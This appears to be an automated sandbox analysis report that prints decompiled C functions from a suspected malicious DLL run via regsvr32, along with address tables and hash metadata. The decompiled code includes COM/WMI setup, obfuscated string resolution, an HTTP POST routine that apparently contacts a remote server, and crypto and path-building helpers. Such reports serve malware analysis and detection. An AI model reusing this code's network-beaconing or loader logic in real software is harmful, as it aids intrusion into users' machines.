                            0x1000df44
                            0x00000000
                            0x1000df44
                            0x1000dcd4
                            0x1000dce8
                            0x1000dcec
                            0x1000dcee
                            0x1000dcf3
                            0x1000df02
                            0x1000df08
                            0x1000df13
                            0x1000df1e
                            0x1000df24
                            0x1000df2a
                            0x1000df2d
                            0x00000000
                            0x1000df2d
                            0x1000dcf9
                            0x1000ded0
                            0x1000ded0
                            0x1000ded3
                            0x1000ded6
                            0x00000000
                            0x00000000
                            0x1000dd01
                            0x1000dd09
                            0x1000dd10
                            0x1000dd16
                            0x1000dd18
                            0x00000000
                            0x00000000
                            0x1000dd21
                            0x1000dd36
                            0x1000dd3c
                            0x1000dd45
                            0x1000dd48
                            0x1000dd4b
                            0x1000dd4d
                            0x1000dec3
                            0x1000dec6
                            0x1000decf
                            0x1000decf
                            0x00000000
                            0x1000decf
                            0x1000dd5d
                            0x1000dd60
                            0x1000dd67
                            0x1000dd6d
                            0x1000dd70
                            0x1000dd73
                            0x1000dd76
                            0x1000dd79
                            0x1000ddb5
                            0x1000ddb5
                            0x1000ddb8
                            0x1000de64
                            0x1000de78
                            0x1000de88
                            0x1000de8c
                            0x1000de8e
                            0x1000dea5
                            0x1000dea9
                            0x1000deb2
                            0x1000debd
                            0x00000000
                            0x1000debd
                            0x1000de94
                            0x1000de95
                            0x1000de9a
                            0x1000de9a
                            0x1000de9c
                            0x1000de9d
                            0x1000dea2
                            0x00000000
                            0x1000dea2
                            0x1000ddbe
                            0x1000ddbe
                            0x1000ddc1
                            0x1000de2c
                            0x1000de40
                            0x1000de50
                            0x1000de54
                            0x1000de56
                            0x00000000
                            0x00000000
                            0x1000de5c
                            0x1000de5d
                            0x00000000
                            0x1000de5d
                            0x1000ddc3
                            0x1000ddc3
                            0x1000ddc6
                            0x00000000
                            0x00000000
                            0x1000ddc8
                            0x1000ddcb
                            0x00000000
                            0x00000000
                            0x1000ddcd
                            0x1000ddcd
                            0x1000ddd3
                            0x1000ddef
                            0x1000ddfe
                            0x1000de07
                            0x1000de0c
                            0x1000de0f
                            0x1000de15
                            0x1000de15
                            0x1000de1a
                            0x1000de26
                            0x00000000
                            0x1000de26
                            0x1000ddd8
                            0x00000000
                            0x1000ddd8
                            0x1000dd7b
                            0x1000dda2
                            0x1000dda7
                            0x1000ddac
                            0x1000ddae
                            0x1000ddae
                            0x00000000
                            0x1000ddac
                            0x1000dd7d
                            0x1000dd7d
                            0x1000dd80
                            0x00000000
                            0x00000000
                            0x1000dd86
                            0x1000dd86
                            0x1000dd89
                            0x00000000
                            0x00000000
                            0x1000dd8f
                            0x1000dd8f
                            0x1000dd92
                            0x00000000
                            0x00000000
                            0x1000dd98
                            0x1000dd9b
                            0x00000000
                            0x00000000
                            0x1000dd9d
                            0x00000000
                            0x1000dd9d
                            0x1000dedf
                            0x1000dee5
                            0x1000deeb
                            0x1000deee
                            0x1000def1
                            0x1000def1
                            0x1000def4
                            0x1000def5
                            0x1000def8
                            0x1000defa
                            0x00000000
                            0x00000000
                            0x1000df4a
                            0x1000df4a
                            0x00000000
                            0x1000df4a
                            0x1000dc81
                            0x1000dc87
                            0x00000000
                            0x1000dc87
                            0x1000df47
                            0x00000000
                            0x1000dbca
                            0x1000dbcf
                            0x1000dbd4
                            0x00000000
                            0x1000dbd8

                            APIs
                              • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                              • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                              • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                              • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
                              • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
                            • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
                            • SysFreeString.OLEAUT32(?), ref: 1000DF82
                            • SysFreeString.OLEAUT32(?), ref: 1000DF8B
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                            • String ID: FALSE$TRUE
                            • API String ID: 224402418-1412513891
                            • Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                            • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
                            • Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                            • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095C7(0x85b);
				_v60 = E100095C7(0xdc9);
				_v56 = E100095C7(0x65d);
				_v52 = E100095C7(0xdd3);
				_t105 = E100095C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C379(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E1000980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E1000980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
										E100085C2( &_v12);
										if(_a24 != 0) {
											E1000980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E10009749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































                            0x1000e671
                            0x1000e683
                            0x1000e68c
                            0x1000e696
                            0x1000e69a
                            0x1000e6ab
                            0x1000e6c2
                            0x1000e6cf
                            0x1000e6dc
                            0x1000e6e9
                            0x1000e6ec
                            0x1000e6f1
                            0x1000e6f6
                            0x1000e6f8
                            0x1000e700
                            0x1000e70b
                            0x1000e712
                            0x1000e71e
                            0x1000e721
                            0x1000e72f
                            0x1000e732
                            0x1000e738
                            0x1000e739
                            0x1000e73b
                            0x1000e744
                            0x1000e745
                            0x1000e74a
                            0x1000e750
                            0x1000e75a
                            0x1000e75c
                            0x1000e761
                            0x1000e761
                            0x1000e770
                            0x1000e77f
                            0x1000e783
                            0x1000e792
                            0x1000e795
                            0x1000e79a
                            0x1000e79e
                            0x1000e7a5
                            0x1000e7ac
                            0x1000e7b4
                            0x1000e7bc
                            0x1000e7c3
                            0x1000e7cb
                            0x1000e7d3
                            0x1000e7da
                            0x1000e7e2
                            0x1000e7ea
                            0x1000e7ff
                            0x1000e80c
                            0x1000e80e
                            0x1000e813
                            0x1000e813
                            0x1000e81a
                            0x1000e82b
                            0x1000e830
                            0x1000e832
                            0x1000e832
                            0x1000e846
                            0x1000e858
                            0x1000e85a
                            0x1000e85d
                            0x1000e862
                            0x1000e862
                            0x1000e869
                            0x1000e878
                            0x1000e87c
                            0x1000e8ba
                            0x1000e8bf
                            0x1000e8c7
                            0x1000e8cc
                            0x1000e8d7
                            0x1000e8dd
                            0x1000e8e7
                            0x1000e8ea
                            0x1000e8f3
                            0x1000e8f8
                            0x1000e8f8
                            0x1000e901
                            0x1000e94a
                            0x1000e94c
                            0x1000e953
                            0x1000e954
                            0x1000e957
                            0x1000e95d
                            0x1000e961
                            0x1000e962
                            0x1000e967
                            0x1000e969
                            0x1000e96f
                            0x1000e984
                            0x1000e98c
                            0x1000e9c1
                            0x1000e9c6
                            0x1000e9cb
                            0x00000000
                            0x1000e9cd
                            0x1000e98e
                            0x1000e990
                            0x1000e990
                            0x1000e999
                            0x1000e99c
                            0x1000e99e
                            0x1000e9a0
                            0x1000e9a6
                            0x1000e9a6
                            0x1000e9ab
                            0x1000e9ad
                            0x1000e9b4
                            0x1000e9b4
                            0x00000000
                            0x1000e9b7
                            0x1000e971
                            0x1000e979
                            0x00000000
                            0x1000e903
                            0x1000e903
                            0x1000e909
                            0x1000e90f
                            0x1000e912
                            0x00000000
                            0x1000e912
                            0x1000e901
                            0x1000e87e
                            0x1000e884
                            0x1000e888
                            0x1000e889
                            0x1000e88e
                            0x1000e890
                            0x1000e896
                            0x1000e8b4
                            0x1000e8b4
                            0x00000000
                            0x1000e8b4
                            0x1000e898
                            0x1000e8a2
                            0x1000e8a4
                            0x1000e8a5
                            0x1000e8aa
                            0x1000e8ac
                            0x1000e8b2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x1000e86b
                            0x1000e86b
                            0x1000e914
                            0x1000e914
                            0x1000e91a
                            0x1000e91d
                            0x00000000
                            0x1000e91d
                            0x1000e81c
                            0x1000e81c
                            0x1000e91f
                            0x1000e91f
                            0x1000e925
                            0x1000e928
                            0x00000000
                            0x1000e928
                            0x1000e81a
                            0x1000e785
                            0x1000e92a
                            0x1000e92d
                            0x1000e92f
                            0x1000e932
                            0x1000e935
                            0x1000e93e
                            0x1000e943
                            0x00000000
                            0x00000000
                            0x1000e947
                            0x00000000
                            0x1000e947
                            0x1000e754
                            0x00000000

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$ErrorLast
                            • String ID: POST
                            • API String ID: 2570506013-1814004025
                            • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                            • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
                            • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                            • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 100116B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E100116B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















                            0x100116c1
                            0x100116c8
                            0x100116d1
                            0x100116d5
                            0x10011750
                            0x00000000
                            0x10011752
                            0x100116e3
                            0x100116e5
                            0x100116ea
                            0x00000000
                            0x00000000
                            0x100116f2
                            0x100116f4
                            0x100116f9
                            0x00000000
                            0x00000000
                            0x10011703
                            0x10011707
                            0x00000000
                            0x00000000
                            0x10011709
                            0x1001170e
                            0x10011710
                            0x10011711
                            0x10011715
                            0x1001171b
                            0x00000000
                            0x00000000
                            0x10011726
                            0x1001172f
                            0x10011733
                            0x00000000
                            0x00000000
                            0x10011735
                            0x10011737
                            0x1001173f
                            0x10011741
                            0x10011742
                            0x1001174a
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                            • API String ID: 667068680-129414566
                            • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                            • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
                            • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                            • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10012122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E10008706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














                            0x10012125
                            0x1001212a
                            0x1001212e
                            0x1001212e
                            0x10012133
                            0x10012138
                            0x10012139
                            0x1001213c
                            0x1001213d
                            0x10012142
                            0x10012145
                            0x10012146
                            0x1001214b
                            0x10012152
                            0x100121f8
                            0x100121f8
                            0x00000000
                            0x10012161
                            0x10012161
                            0x10012168
                            0x1001216c
                            0x10012173
                            0x1001217c
                            0x1001217e
                            0x1001217e
                            0x1001217c
                            0x1001218d
                            0x100121b3
                            0x100121bc
                            0x100121be
                            0x100121c4
                            0x100121f3
                            0x100121f3
                            0x100121fb
                            0x100121fe
                            0x100121fe
                            0x100121c6
                            0x100121c7
                            0x100121cd
                            0x100121cf
                            0x100121cf
                            0x100121d4
                            0x100121d3
                            0x100121d3
                            0x100121db
                            0x100121e7
                            0x100121f1
                            0x100121f1
                            0x00000000
                            0x1001219d
                            0x1001219d
                            0x1001219d
                            0x100121a3
                            0x00000000
                            0x00000000
                            0x100121a5
                            0x100121ab
                            0x100121b0
                            0x00000000
                            0x100121b0
                            0x1001218d

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strchr$_snprintflocaleconv
                            • String ID: %.*g
                            • API String ID: 1910550357-952554281
                            • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                            • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
                            • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                            • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 100102B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: _snprintfqsort
                            • String ID: %I64d$false$null$true
                            • API String ID: 756996078-4285102228
                            • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                            • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
                            • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                            • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10004A0B, Relevance: 9.3, APIs: 6, Instructions: 285stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x2d90590
					_t125 =  *0x1001e68c; // 0x2e0fc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
					E1000B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x2d90590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091E3(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091E3(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9ca);
								E10009F48(0xe);
								E10009F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3ED(_t188, _t180, _t208);
								}
								_t87 = E1000980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x2d90590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x2d90590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
